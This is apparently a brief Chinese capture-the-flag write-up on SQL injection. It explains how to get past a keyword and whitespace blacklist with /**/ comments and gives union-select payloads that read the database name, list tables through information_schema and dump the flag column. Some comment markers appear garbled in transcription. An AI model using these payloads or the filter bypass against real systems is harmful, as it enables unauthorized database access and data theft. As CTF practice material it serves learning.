注释时题目显示hacker!!black_list is /if|and|\s|#|–/i
这里用/**/代替空格,’闭合前面的’,)闭合前面的(,’闭合后面的’
查库名
‘union//select//(select/**/database())’
查到一个test
接着查表
‘//union//select//(select//group_concat(table_name)//from//information_schema.tables//where//table_schema=’test’)’
查到flag
flag中的字段名也叫flag
查询flag
‘//union//select//(select//group_concat(flag)//from//test.flag)’
得到flag
